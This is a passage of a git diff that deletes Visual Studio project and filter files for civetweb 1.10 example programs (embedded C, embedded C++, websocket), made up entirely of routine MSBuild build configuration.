-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140_xp</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>WIN32;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>WIN32;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h" />

-    <ClInclude Include="..\..\include\CivetServer.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\civetweb.c" />

-    <ClCompile Include="..\..\src\CivetServer.cpp" />

-    <ClCompile Include="..\..\examples\embedded_cpp\embedded_cpp.cpp" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_embed_cpp/ex_embed_cpp.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/ex_embed_cpp/ex_embed_cpp.vcxproj.filters
deleted file mode 100644
index 68671e6..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_embed_cpp/ex_embed_cpp.vcxproj.filters
+++ /dev/null
@@ -1,36 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\include\CivetServer.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\examples\embedded_cpp\embedded_cpp.cpp">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\civetweb.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\CivetServer.cpp">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-</Project>

diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_embedded_c/ex_embedded_c.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/ex_embedded_c/ex_embedded_c.vcxproj
deleted file mode 100644
index c3a429f..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_embedded_c/ex_embedded_c.vcxproj
+++ /dev/null
@@ -1,161 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\examples\embedded_c\embedded_c.c" />

-    <ClCompile Include="..\..\src\civetweb.c" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h" />

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{882EC43C-2EEE-434B-A711-C844108D29C6}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>ex_embedded_c</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140_xp</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140_xp</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_IPV6;USE_WEBSOCKET;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalDependencies>winmm.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_IPV6;USE_WEBSOCKET;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_IPV6;USE_WEBSOCKET;WIN32;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_IPV6;USE_WEBSOCKET;WIN32;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_embedded_c/ex_embedded_c.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/ex_embedded_c/ex_embedded_c.vcxproj.filters
deleted file mode 100644
index cf2e4d0..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_embedded_c/ex_embedded_c.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\civetweb.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\examples\embedded_c\embedded_c.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket/ex_websocket.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/ex_websocket/ex_websocket.vcxproj
deleted file mode 100644
index 8076f89..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket/ex_websocket.vcxproj
+++ /dev/null
@@ -1,162 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{58B93E94-7766-435E-93AE-42A2FB5D99B1}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>ex_websocket</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;NDEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\examples\websocket\WebSockCallbacks.h" />

-    <ClInclude Include="..\..\include\civetweb.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\examples\websocket\WebSockCallbacks.c" />

-    <ClCompile Include="..\..\src\civetweb.c" />

-    <ClCompile Include="..\..\examples\websocket\websocket.c" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

